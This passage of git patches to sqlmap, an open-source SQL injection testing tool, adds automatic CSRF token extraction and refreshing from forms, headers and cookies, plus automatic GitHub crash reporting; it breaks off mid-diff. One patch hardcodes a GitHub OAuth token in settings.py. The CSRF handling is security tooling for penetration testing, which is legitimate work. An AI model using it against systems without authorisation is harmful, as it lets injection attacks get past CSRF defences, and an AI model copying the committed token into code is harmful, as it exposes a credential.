--- a/lib/request/connect.py
+++ b/lib/request/connect.py
@@ -63,6 +63,7 @@ from lib.core.enums import WEB_API
 from lib.core.exception import SqlmapCompressionException
 from lib.core.exception import SqlmapConnectionException
 from lib.core.exception import SqlmapSyntaxException
+from lib.core.exception import SqlmapTokenException
 from lib.core.exception import SqlmapValueException
 from lib.core.settings import ASTERISK_MARKER
 from lib.core.settings import CUSTOM_INJECTION_MARK_CHAR
@@ -748,6 +749,34 @@ class Connect(object):
         if value and place == PLACE.CUSTOM_HEADER:
             auxHeaders[value.split(',')[0]] = value.split(',', 1)[1]
 
+        if conf.csrfToken:
+            def _adjustParameter(paramString, parameter, newValue):
+                retVal = paramString
+                match = re.search("%s=(?P<value>[^&]*)" % parameter, paramString)
+                if match:
+                    origValue = match.group("value")
+                    retVal = re.sub("%s=[^&]*" % parameter, "%s=%s" % (parameter, newValue), paramString)
+                return retVal
+
+            page, _, _ = Connect.getPage(url=conf.csrfUrl or conf.url, cookie=conf.parameters.get(PLACE.COOKIE), direct=True, silent=True, ua=conf.parameters.get(PLACE.USER_AGENT), referer=conf.parameters.get(PLACE.REFERER), host=conf.parameters.get(PLACE.HOST))
+            match = re.search(r"<input[^>]+name=[\"']?%s[\"']?\s[^>]*value=(\"([^\"]+)|'([^']+)|([^ >]+))" % conf.csrfToken, page)
+            token = (match.group(2) or match.group(3) or match.group(4)) if match else None
+
+            if not token:
+                errMsg = "CSRF token value '%s' can't be found at '%s'" % (conf.csrfToken, conf.csrfUrl or conf.url)
+                if not conf.csrfUrl:
+                    errMsg += ". You can try to rerun by providing "
+                    errMsg += "a valid value for option '--csrf-url'"
+                raise SqlmapTokenException, errMsg
+
+            if token:
+                for item in (PLACE.GET, PLACE.POST):
+                    if item in conf.parameters:
+                        if item == PLACE.GET and get:
+                            get = _adjustParameter(get, conf.csrfToken, token)
+                        elif item == PLACE.POST and post:
+                            post = _adjustParameter(post, conf.csrfToken, token)
+
         if conf.rParam:
             def _randomizeParameter(paramString, randomParameter):
                 retVal = paramString

From a52c8811e68df9b4c29aad0fc6b1f15d05190921 Mon Sep 17 00:00:00 2001
From: Miroslav Stampar <miroslav.stampar@gmail.com>
Date: Thu, 23 Oct 2014 11:25:44 +0200
Subject: [PATCH 081/492] Minor style update

---
 lib/parse/cmdline.py | 2 +-
 1 file changed, 1 insertion(+), 1 deletion(-)

diff --git a/lib/parse/cmdline.py b/lib/parse/cmdline.py
index 85aa91d63..06eccdd9c 100644
--- a/lib/parse/cmdline.py
+++ b/lib/parse/cmdline.py
@@ -191,7 +191,7 @@ def cmdLineParser():
                            help="Skip URL encoding of payload data")
 
         request.add_option("--csrf-token", dest="csrfToken",
-                           help="Parameter used as a CSRF protection token")
+                           help="Parameter used to hold CSRF protection token")
 
         request.add_option("--csrf-url", dest="csrfUrl",
                            help="URL address to visit to extract CSRF protection token")

From 780dbd1c64690726eed291e77f9a2fc12d230610 Mon Sep 17 00:00:00 2001
From: Miroslav Stampar <miroslav.stampar@gmail.com>
Date: Thu, 23 Oct 2014 11:42:30 +0200
Subject: [PATCH 082/492] Update for an Issue #2

---
 lib/core/target.py | 10 ++++++++++
 1 file changed, 10 insertions(+)

diff --git a/lib/core/target.py b/lib/core/target.py
index 343cb32a2..11910a2d9 100644
--- a/lib/core/target.py
+++ b/lib/core/target.py
@@ -349,6 +349,16 @@ def _setRequestParams():
             errMsg = "CSRF protection token parameter '%s' not " % conf.csrfToken
             errMsg += "found in provided GET and/or POST values"
             raise SqlmapGenericException(errMsg)
+    else:
+        for place in (PLACE.GET, PLACE.POST):
+            for parameter in conf.paramDict.get(place, {}):
+                if parameter.lower().startswith("csrf"):
+                    message = "%s parameter '%s' appears to hold CSRF protection token. " % (place, parameter)
+                    message += "Do you want sqlmap to automatically update it in further requests? [y/N] "
+                    test = readInput(message, default="N")
+                    if test and test[0] in ("y", "Y"):
+                        conf.csrfToken = parameter
+                    break
 
 def _setHashDB():
     """

From 7fc9e82d28f09cddffd0f55b1df0dc140ffcd957 Mon Sep 17 00:00:00 2001
From: Miroslav Stampar <miroslav.stampar@gmail.com>
Date: Thu, 23 Oct 2014 11:44:38 +0200
Subject: [PATCH 083/492] Minor style update

---
 lib/core/common.py | 2 +-
 1 file changed, 1 insertion(+), 1 deletion(-)

diff --git a/lib/core/common.py b/lib/core/common.py
index 2131f695e..c65443b5b 100755
--- a/lib/core/common.py
+++ b/lib/core/common.py
@@ -561,7 +561,7 @@ def paramToDict(place, parameters=None):
 
             if condition:
                 testableParameters[parameter] = "=".join(parts[1:])
-                if not conf.multipleTargets:
+                if not conf.multipleTargets and not (conf.csrfToken and parameter == conf.csrfToken):
                     _ = urldecode(testableParameters[parameter], convall=True)
                     if (_.strip(DUMMY_SQL_INJECTION_CHARS) != _\
                       or re.search(r'\A9{3,}', _) or re.search(DUMMY_USER_INJECTION, _))\

From 32bcca0aae2ebb4aa33dcfe656c1cf0255616fd6 Mon Sep 17 00:00:00 2001
From: Miroslav Stampar <miroslav.stampar@gmail.com>
Date: Thu, 23 Oct 2014 11:54:29 +0200
Subject: [PATCH 084/492] Basic options check for Issue #2

---
 lib/core/option.py | 8 ++++++++
 1 file changed, 8 insertions(+)

diff --git a/lib/core/option.py b/lib/core/option.py
index 65e45a7a4..885005989 100644
--- a/lib/core/option.py
+++ b/lib/core/option.py
@@ -2179,6 +2179,14 @@ def _basicOptionValidation():
         errMsg = "switch '--forms' requires usage of option '-u' ('--url'), '-g', '-m' or '-x'"
         raise SqlmapSyntaxException(errMsg)
 
+    if conf.csrfUrl and not conf.csrfToken:
+        errMsg = "option '--csrf-url' requires usage of option '--csrf-token'"
+        raise SqlmapSyntaxException(errMsg)
+
+    if conf.csrfToken and conf.threads:
+        errMsg = "option '--csrf-url' is incompatible with option '--threads'"
+        raise SqlmapSyntaxException(errMsg)
+
     if conf.requestFile and conf.url and conf.url != DUMMY_URL:
         errMsg = "option '-r' is incompatible with option '-u' ('--url')"
         raise SqlmapSyntaxException(errMsg)

From 7143e61619e144b9b31aa8306e20ec18e275c192 Mon Sep 17 00:00:00 2001
From: Miroslav Stampar <miroslav.stampar@gmail.com>
Date: Thu, 23 Oct 2014 14:00:53 +0200
Subject: [PATCH 085/492] Minor update

---
 lib/core/settings.py | 3 +++
 lib/core/target.py   | 3 ++-
 2 files changed, 5 insertions(+), 1 deletion(-)

diff --git a/lib/core/settings.py b/lib/core/settings.py
index 9f63e00aa..d6c739501 100644
--- a/lib/core/settings.py
+++ b/lib/core/settings.py
@@ -603,6 +603,9 @@ METASPLOIT_SESSION_TIMEOUT = 300
 # Reference: http://www.cookiecentral.com/faq/#3.5
 NETSCAPE_FORMAT_HEADER_COOKIES = "# Netscape HTTP Cookie File."
 
+# Prefixes used for automatic recognition of parameters carrying CSRF protection tokens
+CSRF_TOKEN_PARAMETER_PREFIXES = ("csrf", "xsrf")
+
 # Prefixes used in brute force search for web server document root
 BRUTE_DOC_ROOT_PREFIXES = {
     OS.LINUX: ("/var/www", "/usr/local/apache", "/usr/local/apache2", "/usr/local/www/apache22", "/usr/local/www/apache24", "/usr/local/httpd", "/var/www/nginx-default", "/srv/www", "/var/www/%TARGET%", "/var/www/vhosts/%TARGET%", "/var/www/virtual/%TARGET%", "/var/www/clients/vhosts/%TARGET%", "/var/www/clients/virtual/%TARGET%"),
diff --git a/lib/core/target.py b/lib/core/target.py
index 11910a2d9..f1d284b96 100644
--- a/lib/core/target.py
+++ b/lib/core/target.py
@@ -43,6 +43,7 @@ from lib.core.option import _setDBMS
 from lib.core.option import _setKnowledgeBaseAttributes
 from lib.core.option import _setAuthCred
 from lib.core.settings import ASTERISK_MARKER
+from lib.core.settings import CSRF_TOKEN_PARAMETER_PREFIXES
 from lib.core.settings import CUSTOM_INJECTION_MARK_CHAR
 from lib.core.settings import DEFAULT_GET_POST_DELIMITER
 from lib.core.settings import HOST_ALIASES
@@ -352,7 +353,7 @@ def _setRequestParams():
     else:
         for place in (PLACE.GET, PLACE.POST):
             for parameter in conf.paramDict.get(place, {}):
-                if parameter.lower().startswith("csrf"):
+                if any(parameter.lower().startswith(_) for _ in CSRF_TOKEN_PARAMETER_PREFIXES):
                     message = "%s parameter '%s' appears to hold CSRF protection token. " % (place, parameter)
                     message += "Do you want sqlmap to automatically update it in further requests? [y/N] "
                     test = readInput(message, default="N")

From 01f4b76817f83dd89557fdd2141ba9c826052e5f Mon Sep 17 00:00:00 2001
From: Miroslav Stampar <miroslav.stampar@gmail.com>
Date: Thu, 23 Oct 2014 14:03:44 +0200
Subject: [PATCH 086/492] Minor update for the Issue #2

---
 lib/core/settings.py | 4 ++--
 lib/core/target.py   | 4 ++--
 2 files changed, 4 insertions(+), 4 deletions(-)

diff --git a/lib/core/settings.py b/lib/core/settings.py
index d6c739501..26f83d04c 100644
--- a/lib/core/settings.py
+++ b/lib/core/settings.py
@@ -603,8 +603,8 @@ METASPLOIT_SESSION_TIMEOUT = 300
 # Reference: http://www.cookiecentral.com/faq/#3.5
 NETSCAPE_FORMAT_HEADER_COOKIES = "# Netscape HTTP Cookie File."
 
-# Prefixes used for automatic recognition of parameters carrying CSRF protection tokens
-CSRF_TOKEN_PARAMETER_PREFIXES = ("csrf", "xsrf")
+# Infixes used for automatic recognition of parameters carrying CSRF protection tokens
+CSRF_TOKEN_PARAMETER_INFIXES = ("csrf", "xsrf")
 
 # Prefixes used in brute force search for web server document root
 BRUTE_DOC_ROOT_PREFIXES = {
diff --git a/lib/core/target.py b/lib/core/target.py
index f1d284b96..50a4d0d74 100644
--- a/lib/core/target.py
+++ b/lib/core/target.py
@@ -43,7 +43,7 @@ from lib.core.option import _setDBMS
 from lib.core.option import _setKnowledgeBaseAttributes
 from lib.core.option import _setAuthCred
 from lib.core.settings import ASTERISK_MARKER
-from lib.core.settings import CSRF_TOKEN_PARAMETER_PREFIXES
+from lib.core.settings import CSRF_TOKEN_PARAMETER_INFIXES
 from lib.core.settings import CUSTOM_INJECTION_MARK_CHAR
 from lib.core.settings import DEFAULT_GET_POST_DELIMITER
 from lib.core.settings import HOST_ALIASES
@@ -353,7 +353,7 @@ def _setRequestParams():
     else:
         for place in (PLACE.GET, PLACE.POST):
             for parameter in conf.paramDict.get(place, {}):
-                if any(parameter.lower().startswith(_) for _ in CSRF_TOKEN_PARAMETER_PREFIXES):
+                if any(parameter.lower().count(_) for _ in CSRF_TOKEN_PARAMETER_INFIXES):
                     message = "%s parameter '%s' appears to hold CSRF protection token. " % (place, parameter)
                     message += "Do you want sqlmap to automatically update it in further requests? [y/N] "
                     test = readInput(message, default="N")

From 95f2e61ca18fe16bd5699a650de64b863e2ad6ef Mon Sep 17 00:00:00 2001
From: Miroslav Stampar <miroslav.stampar@gmail.com>
Date: Thu, 23 Oct 2014 14:23:01 +0200
Subject: [PATCH 087/492] Minor fix related to the Issue #2

---
 lib/core/option.py | 2 +-
 1 file changed, 1 insertion(+), 1 deletion(-)

diff --git a/lib/core/option.py b/lib/core/option.py
index 885005989..afe16c522 100644
--- a/lib/core/option.py
+++ b/lib/core/option.py
@@ -2183,7 +2183,7 @@ def _basicOptionValidation():
         errMsg = "option '--csrf-url' requires usage of option '--csrf-token'"
         raise SqlmapSyntaxException(errMsg)
 
-    if conf.csrfToken and conf.threads:
+    if conf.csrfToken and conf.threads > 1:
         errMsg = "option '--csrf-url' is incompatible with option '--threads'"
         raise SqlmapSyntaxException(errMsg)
 

From abbd3523922aa0d64dea345807f49db70b6dc6cc Mon Sep 17 00:00:00 2001
From: Miroslav Stampar <miroslav.stampar@gmail.com>
Date: Thu, 23 Oct 2014 14:33:22 +0200
Subject: [PATCH 088/492] Support for X-CSRF-TOKEN header (Issue #2)

---
 lib/core/target.py     |  4 ++--
 lib/request/connect.py | 23 ++++++++++++++++-------
 2 files changed, 18 insertions(+), 9 deletions(-)

diff --git a/lib/core/target.py b/lib/core/target.py
index 50a4d0d74..cd542d928 100644
--- a/lib/core/target.py
+++ b/lib/core/target.py
@@ -346,9 +346,9 @@ def _setRequestParams():
         raise SqlmapGenericException(errMsg)
 
     if conf.csrfToken:
-        if not any(conf.csrfToken in _ for _ in (conf.paramDict.get(PLACE.GET, {}), conf.paramDict.get(PLACE.POST, {}))):
+        if not any(conf.csrfToken in _ for _ in (conf.paramDict.get(PLACE.GET, {}), conf.paramDict.get(PLACE.POST, {}))) and not conf.csrfToken in set(_[0].lower() for _ in conf.httpHeaders):
             errMsg = "CSRF protection token parameter '%s' not " % conf.csrfToken
-            errMsg += "found in provided GET and/or POST values"
+            errMsg += "found in provided GET, POST or header values"
             raise SqlmapGenericException(errMsg)
     else:
         for place in (PLACE.GET, PLACE.POST):
diff --git a/lib/request/connect.py b/lib/request/connect.py
index 157e0cce2..29550c41c 100644
--- a/lib/request/connect.py
+++ b/lib/request/connect.py
@@ -758,16 +758,21 @@ class Connect(object):
                     retVal = re.sub("%s=[^&]*" % parameter, "%s=%s" % (parameter, newValue), paramString)
                 return retVal
 
-            page, _, _ = Connect.getPage(url=conf.csrfUrl or conf.url, cookie=conf.parameters.get(PLACE.COOKIE), direct=True, silent=True, ua=conf.parameters.get(PLACE.USER_AGENT), referer=conf.parameters.get(PLACE.REFERER), host=conf.parameters.get(PLACE.HOST))
-            match = re.search(r"<input[^>]+name=[\"']?%s[\"']?\s[^>]*value=(\"([^\"]+)|'([^']+)|([^ >]+))" % conf.csrfToken, page)
+            page, headers, code = Connect.getPage(url=conf.csrfUrl or conf.url, cookie=conf.parameters.get(PLACE.COOKIE), direct=True, silent=True, ua=conf.parameters.get(PLACE.USER_AGENT), referer=conf.parameters.get(PLACE.REFERER), host=conf.parameters.get(PLACE.HOST))
+            match = re.search(r"<input[^>]+name=[\"']?%s[\"']?\s[^>]*value=(\"([^\"]+)|'([^']+)|([^ >]+))" % conf.csrfToken, page or "")
             token = (match.group(2) or match.group(3) or match.group(4)) if match else None
 
             if not token:
-                errMsg = "CSRF token value '%s' can't be found at '%s'" % (conf.csrfToken, conf.csrfUrl or conf.url)
-                if not conf.csrfUrl:
-                    errMsg += ". You can try to rerun by providing "
-                    errMsg += "a valid value for option '--csrf-url'"
-                raise SqlmapTokenException, errMsg
+                if conf.csrfUrl != conf.url and code == httplib.OK:
+                    if headers and "text/plain" in headers.get(HTTP_HEADER.CONTENT_TYPE, ""):
+                        token = page
+
+                if not token:
+                    errMsg = "CSRF token value '%s' can't be found at '%s'" % (conf.csrfToken, conf.csrfUrl or conf.url)
+                    if not conf.csrfUrl:
+                        errMsg += ". You can try to rerun by providing "
+                        errMsg += "a valid value for option '--csrf-url'"
+                    raise SqlmapTokenException, errMsg
 
             if token:
                 for item in (PLACE.GET, PLACE.POST):
@@ -777,6 +782,10 @@ class Connect(object):
                         elif item == PLACE.POST and post:
                             post = _adjustParameter(post, conf.csrfToken, token)
 
+                for i in xrange(len(conf.httpHeaders)):
+                    if conf.httpHeaders[i][0].lower() == conf.csrfToken.lower():
+                        conf.httpHeaders[i] = (conf.httpHeaders[i][0], token)
+
         if conf.rParam:
             def _randomizeParameter(paramString, randomParameter):
                 retVal = paramString

From 5e31229d48f6be97db7a8c90a366dd2541676d95 Mon Sep 17 00:00:00 2001
From: Miroslav Stampar <miroslav.stampar@gmail.com>
Date: Thu, 23 Oct 2014 15:18:22 +0200
Subject: [PATCH 089/492] Minor cosmetic update

---
 lib/request/connect.py | 2 +-
 1 file changed, 1 insertion(+), 1 deletion(-)

diff --git a/lib/request/connect.py b/lib/request/connect.py
index 29550c41c..7d5df81f9 100644
--- a/lib/request/connect.py
+++ b/lib/request/connect.py
@@ -768,7 +768,7 @@ class Connect(object):
                         token = page
 
                 if not token:
-                    errMsg = "CSRF token value '%s' can't be found at '%s'" % (conf.csrfToken, conf.csrfUrl or conf.url)
+                    errMsg = "CSRF protection token '%s' can't be found at '%s'" % (conf.csrfToken, conf.csrfUrl or conf.url)
                     if not conf.csrfUrl:
                         errMsg += ". You can try to rerun by providing "
                         errMsg += "a valid value for option '--csrf-url'"

From 6448d3caf4148840567761d8cdec4959ce79dc35 Mon Sep 17 00:00:00 2001
From: Miroslav Stampar <miroslav.stampar@gmail.com>
Date: Fri, 24 Oct 2014 09:37:51 +0200
Subject: [PATCH 090/492] Implementing support for csrfcookie (Issue #2)

---
 lib/core/target.py     |  6 +++---
 lib/request/connect.py | 21 +++++++++++++++++----
 2 files changed, 20 insertions(+), 7 deletions(-)

diff --git a/lib/core/target.py b/lib/core/target.py
index cd542d928..dd0da7b3d 100644
--- a/lib/core/target.py
+++ b/lib/core/target.py
@@ -346,12 +346,12 @@ def _setRequestParams():
         raise SqlmapGenericException(errMsg)
 
     if conf.csrfToken:
-        if not any(conf.csrfToken in _ for _ in (conf.paramDict.get(PLACE.GET, {}), conf.paramDict.get(PLACE.POST, {}))) and not conf.csrfToken in set(_[0].lower() for _ in conf.httpHeaders):
+        if not any(conf.csrfToken in _ for _ in (conf.paramDict.get(PLACE.GET, {}), conf.paramDict.get(PLACE.POST, {}))) and not conf.csrfToken in set(_[0].lower() for _ in conf.httpHeaders) and not conf.csrfToken in conf.paramDict.get(PLACE.COOKIE, {}):
             errMsg = "CSRF protection token parameter '%s' not " % conf.csrfToken
-            errMsg += "found in provided GET, POST or header values"
+            errMsg += "found in provided GET, POST, Cookie or header values"
             raise SqlmapGenericException(errMsg)
     else:
-        for place in (PLACE.GET, PLACE.POST):
+        for place in (PLACE.GET, PLACE.POST, PLACE.COOKIE):
             for parameter in conf.paramDict.get(place, {}):
                 if any(parameter.lower().count(_) for _ in CSRF_TOKEN_PARAMETER_INFIXES):
                     message = "%s parameter '%s' appears to hold CSRF protection token. " % (place, parameter)
diff --git a/lib/request/connect.py b/lib/request/connect.py
index 7d5df81f9..bfb8bf242 100644
--- a/lib/request/connect.py
+++ b/lib/request/connect.py
@@ -767,6 +767,19 @@ class Connect(object):
                     if headers and "text/plain" in headers.get(HTTP_HEADER.CONTENT_TYPE, ""):
                         token = page
 
+                if not token and any(cookie.name == conf.csrfToken for cookie in conf.cj):
+                    for cookie in conf.cj:
+                        if cookie.name == conf.csrfToken:
+                            token = cookie.value
+                            if not any (conf.csrfToken in _ for _ in (conf.paramDict.get(PLACE.GET, {}), conf.paramDict.get(PLACE.POST, {}))):
+                                if post:
+                                    post = "%s%s%s=%s" % (post, conf.paramDel or DEFAULT_GET_POST_DELIMITER, conf.csrfToken, token)
+                                elif get:
+                                    get = "%s%s%s=%s" % (get, conf.paramDel or DEFAULT_GET_POST_DELIMITER, conf.csrfToken, token)
+                                else:
+                                    get = "%s=%s" % (conf.csrfToken, token)
+                            break
+
                 if not token:
                     errMsg = "CSRF protection token '%s' can't be found at '%s'" % (conf.csrfToken, conf.csrfUrl or conf.url)
                     if not conf.csrfUrl:
@@ -775,11 +788,11 @@ class Connect(object):
                     raise SqlmapTokenException, errMsg
 
             if token:
-                for item in (PLACE.GET, PLACE.POST):
-                    if item in conf.parameters:
-                        if item == PLACE.GET and get:
+                for place in (PLACE.GET, PLACE.POST):
+                    if place in conf.parameters:
+                        if place == PLACE.GET and get:
                             get = _adjustParameter(get, conf.csrfToken, token)
-                        elif item == PLACE.POST and post:
+                        elif place == PLACE.POST and post:
                             post = _adjustParameter(post, conf.csrfToken, token)
 
                 for i in xrange(len(conf.httpHeaders)):

From 19aed90ae534fc61da46f0c09450772b9ce464ea Mon Sep 17 00:00:00 2001
From: Miroslav Stampar <miroslav.stampar@gmail.com>
Date: Mon, 27 Oct 2014 00:37:46 +0100
Subject: [PATCH 091/492] Implementation for an Issue #874

---
 lib/core/common.py   | 45 ++++++++++++++++++++++++++++++++++++++++++--
 lib/core/settings.py |  3 +++
 sqlmap.py            |  5 ++++-
 3 files changed, 50 insertions(+), 3 deletions(-)

diff --git a/lib/core/common.py b/lib/core/common.py
index c65443b5b..ccb3a70a1 100755
--- a/lib/core/common.py
+++ b/lib/core/common.py
@@ -9,8 +9,10 @@ import codecs
 import contextlib
 import cookielib
 import copy
+import hashlib
 import httplib
 import inspect
+import json
 import logging
 import ntpath
 import os
@@ -23,6 +25,7 @@ import sys
 import tempfile
 import time
 import urllib
+import urllib2
 import urlparse
 import unicodedata
 
@@ -99,6 +102,7 @@ from lib.core.settings import FORCE_COOKIE_EXPIRATION_TIME
 from lib.core.settings import FORM_SEARCH_REGEX
 from lib.core.settings import GENERIC_DOC_ROOT_DIRECTORY_NAMES
 from lib.core.settings import GIT_PAGE
+from lib.core.settings import GITHUB_REPORT_OAUTH_TOKEN
 from lib.core.settings import GOOGLE_ANALYTICS_COOKIE_PREFIX
 from lib.core.settings import HASHDB_MILESTONE_VALUE
 from lib.core.settings import HOST_ALIASES
@@ -876,7 +880,7 @@ def readInput(message, default=None, checkBatch=True):
         message = "\n%s" % message
         kb.prependFlag = False
 
-    if conf.answers:
+    if conf.get("answers"):
         for item in conf.answers.split(','):
             question = item.split('=')[0].strip()
             answer = item.split('=')[1] if len(item.split('=')) > 1 else None
@@ -892,7 +896,7 @@ def readInput(message, default=None, checkBatch=True):
                 break
 
     if retVal is None:
-        if checkBatch and conf.batch:
+        if checkBatch and conf.get("batch"):
             if isListLike(default):
                 options = ",".join(getUnicode(opt, UNICODE_ENCODING) for opt in default)
             elif default:
@@ -2843,6 +2847,43 @@ def unhandledExceptionMessage():
 
     return maskSensitiveData(errMsg)
 
+def createGithubIssue(errMsg, excMsg):
+    """
+    Automatically create a Github issue with unhandled exception information
+    """
+
+    msg = "\ndo you want to automatically create a new (anonymized) issue "
+    msg += "with the unhandled exception information at "
+    msg += "the official Github repository? [y/N] "
+    test = readInput(msg, default="N")
+    if test[0] in ("y", "Y"):
+        ex = None
+        errMsg = errMsg[errMsg.find("\n"):]
+
+        for match in re.finditer(r'File "(.+?)", line', excMsg):
+            file = match.group(1).replace('\\', "/")
+            file = file[file.find("sqlmap"):].replace("sqlmap/", "", 1)
+            excMsg = excMsg.replace(match.group(1), file)
+
+        data = {"title": "Unhandled exception (#%s)" % hashlib.md5(excMsg).hexdigest()[:8], "body": "```%s\n```\n```\n%s```" % (errMsg, excMsg)}
+        req = urllib2.Request(url="https://api.github.com/repos/sqlmapproject/sqlmap/issues", data=json.dumps(data), headers={"Authorization": "token %s" % GITHUB_REPORT_OAUTH_TOKEN})
+
+        try:
+            f = urllib2.urlopen(req)
+            content = f.read()
+        except Exception, ex:
+            content = None
+
+        issueUrl = re.search(r"https://github.com/sqlmapproject/sqlmap/issues/\d+", content or "")
+        if issueUrl:
+            infoMsg = "created Github issue can been found at the address '%s'" % issueUrl.group(0)
+            logger.info(infoMsg)
+        else:
+            warnMsg = "something went wrong while creating a Github issue"
+            if ex:
+                warnMsg += " ('%s')" % ex
+            logger.warn(warnMsg)
+
 def maskSensitiveData(msg):
     """
     Masks sensitive data in the supplied message
diff --git a/lib/core/settings.py b/lib/core/settings.py
index 26f83d04c..0c31f65cc 100644
--- a/lib/core/settings.py
+++ b/lib/core/settings.py
@@ -474,6 +474,9 @@ DEFAULT_COOKIE_DELIMITER = ';'
 # Unix timestamp used for forcing cookie expiration when provided with --load-cookies
 FORCE_COOKIE_EXPIRATION_TIME = "9999999999"
 
+# Github OAuth token used for creating an automatic Issue for unhandled exceptions
+GITHUB_REPORT_OAUTH_TOKEN = "d6c0c7bf3f2298a7b85f82176c46d2f8d494fcc5"
+
 # Skip unforced HashDB flush requests below the threshold number of cached items
 HASHDB_FLUSH_THRESHOLD = 32
 
diff --git a/sqlmap.py b/sqlmap.py
index 5807b341f..87035781a 100755
--- a/sqlmap.py
+++ b/sqlmap.py
@@ -21,6 +21,7 @@ from lib.utils import versioncheck  # this has to be the first non-standard impo
 
 from lib.controller.controller import start
 from lib.core.common import banner
+from lib.core.common import createGithubIssue
 from lib.core.common import dataToStdout
 from lib.core.common import getUnicode
 from lib.core.common import setColor
@@ -127,9 +128,11 @@ def main():
     except:
         print
         errMsg = unhandledExceptionMessage()
+        excMsg = traceback.format_exc()
         logger.critical(errMsg)
         kb.stickyLevel = logging.CRITICAL
-        dataToStdout(setColor(traceback.format_exc()))
+        dataToStdout(excMsg)
+        createGithubIssue(errMsg, excMsg)
 
     finally:
         if conf.get("showTime"):

From e08c8f272a304132db7262cab6d488cc84d25c76 Mon Sep 17 00:00:00 2001
From: Miroslav Stampar <miroslav.stampar@gmail.com>
Date: Tue, 28 Oct 2014 13:10:07 +0100
Subject: [PATCH 092/492] Fix for an Issue #875

---
 lib/core/option.py | 2 +-
 1 file changed, 1 insertion(+), 1 deletion(-)

diff --git a/lib/core/option.py b/lib/core/option.py
index afe16c522..7283a980c 100644
--- a/lib/core/option.py
+++ b/lib/core/option.py
@@ -940,7 +940,7 @@ def _setTamperingFunctions():
             priority = PRIORITY.NORMAL if not hasattr(module, '__priority__') else module.__priority__
 
             for name, function in inspect.getmembers(module, inspect.isfunction):
-                if name == "tamper":
+                if name == "tamper" and inspect.getargspec(function).args and inspect.getargspec(function).keywords == "kwargs":
                     found = True
                     kb.tamperFunctions.append(function)
                     function.func_name = module.__name__

From f89e94fb8c18d7c8ac812bd5afbe119665d5d430 Mon Sep 17 00:00:00 2001
From: Miroslav Stampar <miroslav.stampar@gmail.com>
Date: Tue, 28 Oct 2014 13:42:13 +0100
Subject: [PATCH 093/492] Minor refactoring

---
 lib/request/basic.py | 3 +--
 1 file changed, 1 insertion(+), 2 deletions(-)

diff --git a/lib/request/basic.py b/lib/request/basic.py
index ac887e08c..e361c4dad 100755
--- a/lib/request/basic.py
+++ b/lib/request/basic.py
@@ -95,8 +95,7 @@ def forgeHeaders(items=None):
                         kb.mergeCookies = not _ or _[0] in ("y", "Y")
 
                     if kb.mergeCookies:
-                        _ = lambda x: re.sub("(?i)%s=[^%s]+" % (cookie.name, conf.cookieDel or DEFAULT_COOKIE_DELIMITER), "%s=%s" % (cookie.name, getUnicode(cookie.value)), x)
-                        headers[HTTP_HEADER.COOKIE] = _(headers[HTTP_HEADER.COOKIE])
+                        headers[HTTP_HEADER.COOKIE] = re.sub(r"(?i)\b%s=[^%s]+" % (re.escape(cookie.name), conf.cookieDel or DEFAULT_COOKIE_DELIMITER), "%s=%s" % (cookie.name, getUnicode(cookie.value)), headers[HTTP_HEADER.COOKIE])
 
                         if PLACE.COOKIE in conf.parameters:
                             conf.parameters[PLACE.COOKIE] = _(conf.parameters[PLACE.COOKIE])

From 268e774087ed0584c0f89b59361f678449e1572f Mon Sep 17 00:00:00 2001
From: Miroslav Stampar <miroslav.stampar@gmail.com>
Date: Tue, 28 Oct 2014 13:44:55 +0100
Subject: [PATCH 094/492] Minor refactoring

---
 lib/request/basic.py | 3 ++-
 1 file changed, 2 insertions(+), 1 deletion(-)

diff --git a/lib/request/basic.py b/lib/request/basic.py
index e361c4dad..2fa61b6d2 100755
--- a/lib/request/basic.py
+++ b/lib/request/basic.py
@@ -95,7 +95,8 @@ def forgeHeaders(items=None):
                         kb.mergeCookies = not _ or _[0] in ("y", "Y")
 
                     if kb.mergeCookies:
-                        headers[HTTP_HEADER.COOKIE] = re.sub(r"(?i)\b%s=[^%s]+" % (re.escape(cookie.name), conf.cookieDel or DEFAULT_COOKIE_DELIMITER), "%s=%s" % (cookie.name, getUnicode(cookie.value)), headers[HTTP_HEADER.COOKIE])
+                        _ = lambda x: re.sub(r"(?i)\b%s=[^%s]+" % (re.escape(cookie.name), conf.cookieDel or DEFAULT_COOKIE_DELIMITER), "%s=%s" % (cookie.name, getUnicode(cookie.value)), x)
+                        headers[HTTP_HEADER.COOKIE] = _(headers[HTTP_HEADER.COOKIE])
 
                         if PLACE.COOKIE in conf.parameters:
                             conf.parameters[PLACE.COOKIE] = _(conf.parameters[PLACE.COOKIE])

From 3b3b8d4ef2319502d3e096dbd9c13796932a577f Mon Sep 17 00:00:00 2001
From: Miroslav Stampar <miroslav.stampar@gmail.com>
Date: Tue, 28 Oct 2014 14:02:55 +0100
Subject: [PATCH 095/492] Potential bug fix (escaping formatted regular
 expressions)

---
 lib/core/common.py          |  8 ++++----
 lib/core/option.py          |  2 +-
 lib/parse/banner.py         |  2 +-
 lib/request/connect.py      | 12 ++++++------
 lib/utils/pivotdumptable.py |  4 ++--
 plugins/generic/entries.py  |  2 +-
 6 files changed, 15 insertions(+), 15 deletions(-)

diff --git a/lib/core/common.py b/lib/core/common.py
index ccb3a70a1..87b7da4bf 100755
--- a/lib/core/common.py
+++ b/lib/core/common.py
@@ -1286,7 +1286,7 @@ def expandAsteriskForColumns(expression):
             if expression != conf.query:
                 conf.db = db
             else:
-                expression = re.sub(r"([^\w])%s" % conf.tbl, "\g<1>%s.%s" % (conf.db, conf.tbl), expression)
+                expression = re.sub(r"([^\w])%s" % re.escape(conf.tbl), "\g<1>%s.%s" % (conf.db, conf.tbl), expression)
         else:
             conf.db = db
         conf.db = safeSQLIdentificatorNaming(conf.db)
@@ -2503,11 +2503,11 @@ def removeDynamicContent(page):
             if prefix is None and suffix is None:
                 continue
             elif prefix is None:
-                page = re.sub(r'(?s)^.+%s' % suffix, suffix, page)
+                page = re.sub(r'(?s)^.+%s' % re.escape(suffix), suffix, page)
             elif suffix is None:
-                page = re.sub(r'(?s)%s.+$' % prefix, prefix, page)
+                page = re.sub(r'(?s)%s.+$' % re.escape(prefix), prefix, page)
             else:
-                page = re.sub(r'(?s)%s.+%s' % (prefix, suffix), '%s%s' % (prefix, suffix), page)
+                page = re.sub(r'(?s)%s.+%s' % (re.escape(prefix), re.escape(suffix)), '%s%s' % (prefix, suffix), page)
 
     return page
 
diff --git a/lib/core/option.py b/lib/core/option.py
index 7283a980c..21fe4f8c9 100644
--- a/lib/core/option.py
+++ b/lib/core/option.py
@@ -233,7 +233,7 @@ def _feedTargetsDict(reqFile, addedTargetUrls):
